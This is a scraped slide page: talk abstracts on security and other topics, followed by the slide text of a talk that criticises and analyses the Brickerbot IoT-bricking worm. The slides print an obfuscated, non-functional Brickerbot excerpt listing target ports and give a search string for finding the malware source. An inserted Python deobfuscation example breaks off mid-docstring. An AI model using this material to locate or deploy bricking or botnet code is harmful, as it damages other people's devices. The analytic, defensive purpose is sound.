Recently someone released a worm on the Internet that targeted IoT devices. In the past, similar worms turned your Internet-connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them, the better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea, and what more constructive ways there are to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
THOTCON 0x6: Going Kinetic on Electronic Crime Networks, by John Bambenek
Defensive security is a rat race. We detect new threats, we reverse engineer them and develop defenses while the bad guys just make new threats. We often just document a new threat and stop when the blog post is published. This talk will take it a step further on how to proactively disrupt threats and threat actors, not just from your organization but completely. As a case study, Operation Tovar and whatever else I take down between now and THOTCON will be used as examples of how this can be accomplished without a large legal team and without massive collateral damage (as in the No-IP incident). Tools will be demonstrated that are used for near-real-time surveillance of criminal networks.
Major security intrusions at businesses large and small, private and government, indicate that the Internet is far less secure than most realize. After reading this, you may want to reconsider how secure your private data and information really is.
Staying Ahead of Internet Background Exploitation - Microsoft BlueHat Israel ..., by Andrew Morris
It’s not just you. The frequency of severe vulnerabilities in internet-facing enterprise software being massively exploited at scale has increased drastically. The amount of time between disclosure and exploitation of these vulnerabilities has been reduced to near-zero, leaving defenders with less time to react and respond. While combating internet-wide opportunistic exploitation is a sprawling and complex problem, there is both an art and a science to staying ahead of large exploitation events such as Log4J.
In this talk we will share insights and challenges from operating a huge, shifting, adaptive, distributed sensor network listening to internet background noise and opportunistic exploitation traffic over the past four years. We will give a blunt state of the universe on mass exploitation. We will share patterns and unexplainable phenomena we’ve experienced across billions of internet scans. And we will make recommendations to defenders for preparing for the next time the cyber hits the fan.
Big Brother is watching. His name is Binder.
Binder is the only vehicle of inter-process communication in Android, making it a prime target for attackers.
We'll provide a review of this sophisticated and little-known mechanism, describe the multitude of dangers in its compromise and demonstrate several Binder-based data manipulation and theft attacks.
In depth (presentation outline):
* The Android malware world lags behind the PC in sophistication, but is rapidly catching up. We believe the next generation of mobile malware is soon to come, and the Binder is a natural target.
* Binder Background (what makes it special?):
- The peculiarity of Android's architecture: on the idea of a userland OS built on top of the Linux kernel, and how Binder is critical to this concept.
- The inevitable security trade-off in Android: Minimizing the attack surface against the kernel, at the cost of introducing Binder as a classic single-point-of-control.
- How a developer sees the Binder (spoiler: he doesn't).
* In depth Binder mechanics (how does it work?):
- A detailed look at the data structures, classes and functions which define the behaviour of Binder, with a special focus on security-critical areas.
- Hooking Binder: How and where to control Android's IPC mechanism.
- Looking at the raw data travelling through Binder, and how to sift through it to find the interesting stuff (passwords, keyboard input, SMS, sound and many more).
- Why modern mobile AVs are having a hard time detecting these methods of operation.
* (Demonstrations) Comparing the "naive malware" approach and Man in the Binder philosophy to:
-> Logging keyboard input.
-> Capturing data sent between Activities.
-> Modifying sensitive information at runtime (e.g. faking a financial transaction, banking-trojan style).
* Mitigation:
- Why code obfuscation and app wrapping won't help you.
- Encrypting your data before it leaves the process (even within the same app!).
- Example: using an in-app keyboard securely.
We believe that this is ground-breaking work that has not been properly researched before: Binder’s central position in the Android architecture means that it is likely to become heavily attacked in the next few years. By shining a bright light on this topic, our research is a significant contribution to the security of the Android platform as a whole.
An earlier version of this research was presented at Black Hat Europe 2014 and Kaspersky SAS2015.
A white paper of the results up until a few months ago can be found here: https://www.blackhat.com/docs/eu-14/materials/eu-14-Artenstein-Man-In-The-Binder-He-Who-Controls-IPC-Controls-The-Droid.pdf
Cyber Analysts: who they are, what they do, where they are - Marco Ramilli - ..., by Codemotion
Cyber security is one of the most challenging topics in the current era. Cyber attacks are becoming day by day more sophisticated and difficult to be detected by automated systems. People who understand cyber threats and act to block cyber attacks are defined as cyber analysts. But what do they really do? What difficulties do they meet and what background should they have before starting the "neverending" "cyber security" learning path? Why is an automated system not enough? Marco will talk about real experiences in the cyber analyst field.
Zero Privilege Architectures v1.1_for distribution.pdf, by Thijs Ebbers
Zero Privilege: "Platform Thinking" meets "Secure-by-Design" meets "Secure-by-Default". In this talk Diana and Thijs use several lessons from history to explain what risks are typically overlooked in many IT implementations and explain what ING has done (and encourages others to do) to defend against today's IT adversaries. Additionally, some very practical advice is included to help others embark on a "Zero Privilege" journey. The talk concludes with some urgent guidance from several well-known governmental cybersecurity bodies.
Presentation by Haroon Meer at IDC in 2006.
The presentation begins with a discussion of Google hacking. There is a brief discussion of kernel rootkits. The presentation ends with a discussion of web application hacking.
[2010 CodeEngn Conference 04] Max - Fighting against Botnet, by GangSeok Lee
2010 CodeEngn Conference 04
Botnets have become the representative attack weapon of cyber warfare. As networks grow ever faster and more complex, DDoS attacks such as the 7.7 DDoS, and leaks of personal information such as Internet accounts and financial data, are being carried out through botnets. In this talk we analyze botnets actually operating in cyberspace and try to identify the botnet business models they pursue. We will also demonstrate the design, operation, management of and response to botnets, and discuss wars between botnets.
http://codeengn.com/conference/04
N. Oskina, G. Asproni - Be your own Threatbuster! - Codemotion Milan 2018, by Codemotion
Creating a quality web application is hard. It’s hard to gain customers, it’s hard to build your reputation and it’s hard to keep the costs low. Nevertheless, security is often an afterthought. However… Have you considered the cost of fixing security issues later? What about the reputational damage of a security breach? Are you worried about your customers’ data? We will talk about good security coding practices for web applications and how to apply them early on using some real-world examples. We will also help you to think about your website’s vulnerabilities from the view of a hacker.
Release The Hounds: Part 2 “11 Years Is A Long Ass Time”, by Casey Ellis
Bugcrowd was founded at an inflection point in the history of the Internet and awareness of cybersecurity. A lot has changed since 2012 - to the cybersecurity industry, to the technology landscape, to the view of hackers as helpful and not just harmful, and - importantly - to the awareness of cybersecurity as "everyone's problem".
In 2023, we find ourselves at a similar inflection point for our space. This keynote unpacks the last 11 years as a predictor of what is next, and as an encouragement and roadmap for budding cybersecurity entrepreneurs and solutioneers.
The Hardcore Stuff I Hack:
This talk is going to give a run-through of some of the technical challenges Paul and his team have overcome over the years, in as much hardcore detail as possible.
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey, by Saumil Shah
I started my company, Net-Square, 12 years ago. This talk is a collection of 13 thoughts and observations from the past 12 years - some technical, some philosophical and some pointed questions for all of us to reflect upon. I would like to talk about my journey in the information security industry, from the fledgling years in the late 90s where I was still entrenched in academia to the present day where infosec is redefining the world's political boundaries, literally and figuratively. This talk is not a rant, not a venting session and certainly not a criticism of sorts as many infosec talks have now become.
Using big data and implementing Hadoop is a trend that people jump to all too quickly. Instead, understanding the run-time complexity of one's algorithms, reducing said complexity and managing the process from start to finish in a lean and agile way can yield massive cost savings - or save your organization.
There's no S(ecurity) in IoT: This is why we can't sleep, by Jimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APT, by Jimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat (APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
- How attackers are moving to mobile in order to bypass traditional protection.
- Apps are only one part of the problem. Documents, email, messaging are still left wide open.
- Bypassing mobile antivirus.
- Bypassing MDM, MAM and containers.
- Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experiment, by Jimmy Shah
The Internet of Things is not as complex as one would think. Objects (e.g. power meters, fridge computers, etc.) or "Things" don't have their own Internet; instead they "speak" to each other over the same Internet we all use. There lies their vulnerability: the assumption that, since the machines will only talk to each other, no one will eavesdrop or intrude on their conversation. Security researchers have a saying: "Security through Obscurity is no Security".
The presentation shows how an attacker (or, more likely, a security researcher) would pierce the Internet of Things' veil of obscurity to assess a particular Smart Parking Meter ecosystem. Only open source intelligence (OSINT) [e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine-to-machine (M2M) SIMs
* management consoles
* RF usage
Viruses on mobile platforms: why we don't/don't we have viruses on Android, by Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics: the path from 'eh' to 'pretty good', by Jimmy Shah
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones. Attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful (i.e. fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware, by Jimmy Shah
Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
Smartphone Ownage: The state of mobile botnets and rootkits, by Jimmy Shah
Symbian Botnet? Mobile Linux Rootkits? iPhone Botnets? Millions of phones at risk? The press coverage on smart phone threats is at times somewhat accurate, distant, and occasionally (if unintentionally) misleading. They tend to raise questions such as: How close to PC levels (100,000+ to millions of nodes) have mobile botnets reached? Have mobile rootkits reached the complexity of those on the PC?
This talk covered the state of rootkits and botnets on smart phones from the perspective of anti-malware researchers, including demystification of the threat from mobile rootkits and mobile botnets, the differences (if any) between mobile rootkits and mobile botnets vs. their PC counterparts, and a look at how samples seen in the wild and researcher PoCs function.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024, by Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
A tale of scale & speed: How the US Navy is enabling software delivery from l..., by sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATOs (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
DevOps and Testing slides at DASA Connect, by Kari Kakkonen
Slides by me and Rik Marselis from the DASA Connect conference on 30.5.2024. We discuss what testing is, then what agile testing is, and finally what testing in DevOps is. We also had a lovely workshop with the participants, trying to find different ways to think about quality and testing in the different parts of the DevOps infinity loop.
Essentials of Automations: The Art of Triggers and Actions in FME, by Safe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
GridMate - End to end testing is a critical piece to ensure quality and avoid..., by ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
UiPath Test Automation using UiPath Test Suite series, part 6, by DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Free Complete Python - A step towards Data Science
Brick all the Internet of Things! (with notes)
23. Brick all the Internet of Things!!:
We want to make things more secure, right?
Jimmy Shah
24. Disclaimers
● The views, opinions, and positions expressed in this
presentation are solely those of the author
● They do not necessarily represent the views and
opinions of my employer and do not constitute or imply
any endorsement or recommendation from my
employer
25. Nixon is a great security researcher and I agree wholeheartedly with the first half of this statement. Attackers are using botnets primarily for profit, with Distributed Denial of Service (DDOS) as a primary source of income.
I respectfully disagree with the idea that the only solution is to turn to law enforcement. While law enforcement has great powers of investigation and response after the fact, there are still a number of steps we can take to prevent attacks.
Ultimately, what’s going with these IoT botnets is crime.
People are talking about these cybersecurity problems —
problems with the devices, etc. — but at the end of the day
it’s crime and private citizens don’t have the power to make
these bad actors stop.
— Allison Nixon,
Director of Security Research
Flashpoint
Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018.
https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
26. Attackers exploiting botnets to perform large-scale DDOSes has become common. Bots (also called robots or zombies) are nodes in a network of malicious machines. Traditionally attackers either infected machines with malware or, in a less automated fashion, convinced users to act as bots.
LOIC is an example of software that allows users to participate in a DDOS. This is the simplest technique: each user is independent but collaborates with a multitude of like-minded users. Imagine a hundred thousand individuals each with a single rifle all aiming at the same target. Some will miss. Some rifles will misfire. Some will never understand how to fire a bullet. Regardless, a majority will hit the target. Of course the efficiency of such an attack is much less than one that eliminates human error.
Infecting numerous bots is sometimes only the first step. An attacker with hundreds of thousands or millions of bots needs to do something with them. They make no money lying idle. This is where another traditional technique is used, DOSaaS (Denial of Service as a Service): I have a botnet, you pay me to take your target down, we all profit. Except the major site we’ve just knocked down.
DDOS
● Traditional
○ What’s a bot?
■ Robots, zombies, etc.
■ Nodes in a network of malicious machines
○ Attacker convinces/infects normal users to become bots
○ Attacker sends commands to DOS a victim site
○ Profit
● Also Traditional, but DOSaaS
○ Attacker buys/rents bots
○ Same as the above
27. Attackers are looking to make a profit. The usual methods work, but they can be costly. There is a need to purchase or develop one’s own malware to build up one’s botnet. IoT botnets help to reduce those costs. Several IoT botnets have had their source code released by their authors.
Turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no real authentication. Default credentials. Let me repeat that: default username/password combinations that users can’t easily change.
Mirai made the big splash, using a long list of default credentials to log in to embedded devices and then turning them into bots.
Having a list of default creds is useful, but more benevolent trespassers on one’s internet-enabled cameras and home routers can also use the same list in order to log in and patch your systems. Linux.Wifatch is famous for being a worm that connects to IoT devices and patches them, locking out the bad guys. Linux.Hajime does something similar, locking down ports and preventing other botnets from connecting.
As another show of good faith, the authors of Linux.Wifatch released the source code to their patching worm.[1]
Good or bad, none of these worms would gain as much traction amongst IoT devices if it were possible to modify logins.
[1] https://gitlab.com/rav7teif/linux.wifatch
DDOS via IoT Botnet
● Similar to DDOSaaS
○ Except the bots are free
■ Even more free? Due to default creds.
Mirai
Linux.Wifatch Linux.Hajime
28. Right so, Brickerbot. Where Wifatch and Hajime do their part in securing devices by
changing passwords or disabling outside access, Brickerbot goes about it in a
slightly different manner. If we just brick all of these vulnerable IoT devices they can’t
be turned against us. Great idea.
Mudge, of L0pht and DARPA, has heard about this idea too. From reasonable folks in
the Intelligence Community and the Department of Defense. These are kind of the
folks who get to take direct action. Except it seems even they couldn’t get away with
bricking the devices of civilians in the US and all over the world.
So, Brickerbot?
29. The author of Brickerbot calls himself The Doctor. He has also posted on an underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor directly connects online identities or claims credit. Attribution is harder when all you have is the end result, such as a binary or obfuscated script.
A source code release, like the one the authors of Linux.Wifatch made, is a primary method of claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is like showing off portions of a wrecked fighter aircraft with any and all markings or identifying information missing/removed. It makes for a great showpiece and allows one to take or (more often) give credit. Other researchers suggest that some of the attacks that The Doctor claimed, such as one on a major mobile carrier’s network, were not performed by him, or at least not using any of the exploits contained in Brickerbot. Do we just take the word of whichever party we have a greater trust in? Without a release of source or of forensic results from various attacks, it seems that’s the default position.
Where are we?
1) We may not be able to trust Brickerbot’s ‘author’
2) The publicly available sample is essentially an obfuscated list of exploits and
‘bricking’ code
3) We need to examine the Brickerbot code a little closer to see what we have
30. Bricking is just turning useful devices into something as useful as a brick. This is a perfectly legal action that one can perform on devices that one owns. When done to others, it is almost always illegal and occasionally an act of war.
To be clear, Brickerbot is intended to operate entirely on others’ devices.
So, Brickerbot?
● What’s bricking?
○ Turning a useful device into something as useful as a ‘brick’
31. Normally, coming from the malware analysis side, I’m loath to help spread malware. In this case, the cat is out of the bag, the horses have left the barn, and there are dozens of pastebin-like sites and one or two github accounts with a copy of the released Brickerbot script.
So if you would like a copy of the script in order to play along at home/analyze, just google for the following line.
Brickerbot: source code
● Want a copy of Brickerbot?
○ Google
■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1”
● Mirrored on github and various pastebin like sites
32. A quick aside about the malware analysis process. Assuming you’re not doing it as a
hobby it’s almost always performed under pressure.
One never has enough time to do a complete teardown, to check every nook and cranny
of a given target. You may love puzzles and even enjoy completely solving them, but
you never have that time at work. When you eventually do, it’s known as that nearly
mythical time period ‘vacation’.
An analyst always has to deal with multiple competing pressures from various interested
parties. In no particular order:
● Customers
● Bosses/Upper Management
● Competitors
● Press
Depending on how one receives a sample one or more of these will be aware and the
clock starts ticking. One won’t always satisfy all parties. Regardless, handling the
various competing interests is the job.
OK, you don’t have unlimited time. A customer is under attack. The press is minutes from publishing. Higher-ups are yelling at your boss for an update. What do you do?
Generally one searches for IOCs (Indicators of Compromise). It really does become: What is the least I need to see before I know my home/office/business is irrecoverable?
Aside: Malware analysis process - under pressure
● Not always enough time
○ fully unwind and solve every aspect of every puzzle within a sample
■ That’s called ‘vacation’
● Interested parties breathing down analysts’ necks
○ Customers, bosses, competitors, press
■ Handling these is ‘the job’
● Identify IOCs(Indicators of Compromise)
○ What is the least I need to see before I know my home/office/business is irrecoverable?
33. What has The Doctor dropped in our collective laps?
We’ve got a script that appears obfuscated. No line listing the interpreter the shell should use. First steps for analyzing this malware:
1) Let’s see if it runs
a) Make sure the VM has no network access
b) Include possible runtimes (python2, python3)
Shocker! It doesn't run. Why?
Running with Python 3 fails, mainly due to the print statement becoming a function in Python 3. Thus we know it’s Python 2.
Running under Python 2 it fails. Symbol not found. In this case due to additional whitespace turning a function call into an undefined symbol. Next, we need to remove extraneous whitespace.
Re-run and it fails again. This time due to not a single library being imported. You have to be kidding me. The script as provided was never intended to run.
2) Maybe de-obfuscating the script would simplify the analysis
● Writing a custom de-obfuscator is a good solution; unfortunately it’s a vacation project. We’ve still got a job to do.
● It’s good to get acquainted with tokenizer.py for that eventual vacation
● We can still write a one-off script to quickly remove dead code. Dead code being things like if statements that are always false, or statements
Brickerbot: Getting to the heart of the issue
● Malware analysis
○ Get it running(VM, python(s), no network)
■ Nope, bad interp. Python2
■ Nope, symbol not found. ‘Extra’ whitespace.
■ Nope, libraries not imported. Enough nonsense.
○ De-obfuscate
■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’.
● (still, become friends with tokenizer.py)
■ Custom script to remove dead code
● Become friends with PyLint
■ Pretty-print remainder of source
34. Now that you’ve figured out it’s non-functional, it’s time to find all the low-hanging fruit. In this case, the author provided the initial hint, suggesting that one could just check the unencrypted/unobfuscated strings.
One of the first steps in statically analyzing all malware is to extract all strings. Really. Some of the best clues for attribution come from identifiers left in the code, or shout-outs to colleagues or malware researchers. Egos have led to a number of malware authors getting convicted.
In the case of Brickerbot, the simple obfuscation used by the author removes all identifiers (i.e. variable names, messages, etc.). It’s more about not having it tied back to the author than making it difficult to learn how the worm operates.
Another time-saver used in analysis is to read other analysts’ reports. This lets you see if you’ve missed anything important (e.g. malware emailing all your contacts). It also lets you re-direct analysis to portions of the malware not yet analyzed or to specific payloads.
With Brickerbot, since it won’t run and there’s a lot of useless code, an analyst can look at it as a container for various IoT device exploits.
Brickerbot: Getting to the heart of the issue,cont.
● Malware analysis
○ Examine low-hanging fruit
■ Strings
● Seriously
● First step used by malware analysts
■ Read reports by other analysts
● Catch what you missed/ran out of time to find
● Re-prioritize resources towards areas that have greatest impact
35. Let’s look at the Brickerbot source code.
Random, similar-looking variable names, more whitespace than necessary. This looks horrible.
The if statements where the conditional is equivalent to 0 will never run the code that follows. Dead code.
There are spaces in function calls. These don’t even help readability, so the sleep call on line 7 isn’t actually a .sleep() call; it’s just the undefined symbol time, a dot, and the undefined symbol sleep.
Much of this can be removed, as described earlier, with a custom script to delete all dead code.
Brickerbot: Source code - obfusc., ex. whitespace
1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
4. if 21 - 21: Oooo - I11I1Ii
5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
7. time . sleep ( 3 )
8. if 20 - 20: Oo0
9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
12. if 84 - 84: I11I1Ii * Ii11i1iIi
13. I1IiI1I1 = OOo0O0oOOOO
14. if 4 - 4: Oooo + oOOo0000o
15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
16. i111IIIiII1i = False
17. Oo0O00OOooO = False
18. IiiI1 = False
19. oOI11IIIi1II111 = True
20. iiIII11I1i1Ii = True
21. I1i = True
22. i11iiiIi = True
23. i1iii = True
24. OOoOo00oO0 = True
25. OO00oo0o = True
26. if 5 - 5: IIiII + O0oo - i1
27. if 52 - 52: oOoO0Ooo / Ii / Ii
28. if 24 - 24: oOOoO00oo0
29. i11 = [ ]
30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ]
31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
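As an added example (not the talk’s own script and not Brickerbot code) of the one-off clean-up described on slides 33 and 35 and the “strings first” step from slide 34: an AST pass that folds the `if N - N:` guards, drops the dead blocks, re-emits the source without the padded whitespace, and lists the string literals. It assumes Python 3.9+ (for ast.unparse) and a sample that already parses under Python 3; the sample is constructed in the style of the listing above, not taken from the real script.

```python
"""Dead-code stripping and string extraction for an obfuscated Python sample.

Added example for slides 33-35; not the talk's own script or Brickerbot code.
Assumes Python 3.9+ (ast.unparse) and input that parses under Python 3 (the
real script is Python 2, so its print statements would have to be handled
first). SAMPLE is a constructed stand-in in the style of the slide 35 listing.
"""
import ast
import operator

# Constructed sample: `if N - N:` guards that never run, meaningless names,
# padded whitespace such as `time . sleep ( 3 )`, and one string literal.
SAMPLE = """\
if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
if 0: oOoO0Ooo . Ii % Oo0
time . sleep ( 3 )
II1I1i11 = [ 23 , 2222 , 2323 , 7547 ]
if 5 - 5: IIiII + O0oo - i1
def IIi1IIii11I1I ( targetip , targetport ) :
    if 1 - 1:
        return None
    O0000oO0O = ( targetip , int ( targetport ) )
    return O0000oO0O
ii11II = 'connected'
"""

# Only the arithmetic the obfuscator emits in the guards; no division, so
# folding can never raise.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _const_value(node):
    """Fold `82 - 82`-style constant arithmetic.

    Returns (True, value) when the expression is a compile-time constant,
    otherwise (False, None)."""
    if isinstance(node, ast.Constant):
        return True, node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        lok, lv = _const_value(node.left)
        rok, rv = _const_value(node.right)
        if lok and rok and all(isinstance(v, (int, float)) for v in (lv, rv)):
            return True, _OPS[type(node.op)](lv, rv)
    return False, None


class DeadIfRemover(ast.NodeTransformer):
    """Drop `if <always-false>:` blocks (keeping any else branch) and unwrap
    `if <always-true>:` blocks into their body."""

    def visit_If(self, node):
        self.generic_visit(node)  # clean nested ifs first
        folded, value = _const_value(node.test)
        if not folded:
            return node
        # NodeTransformer splices a returned list into the parent's body and
        # removes the statement when None is returned.
        return node.body if value else (node.orelse or None)


def clean_source(src):
    """Parse, remove dead guards and re-emit normalised source.

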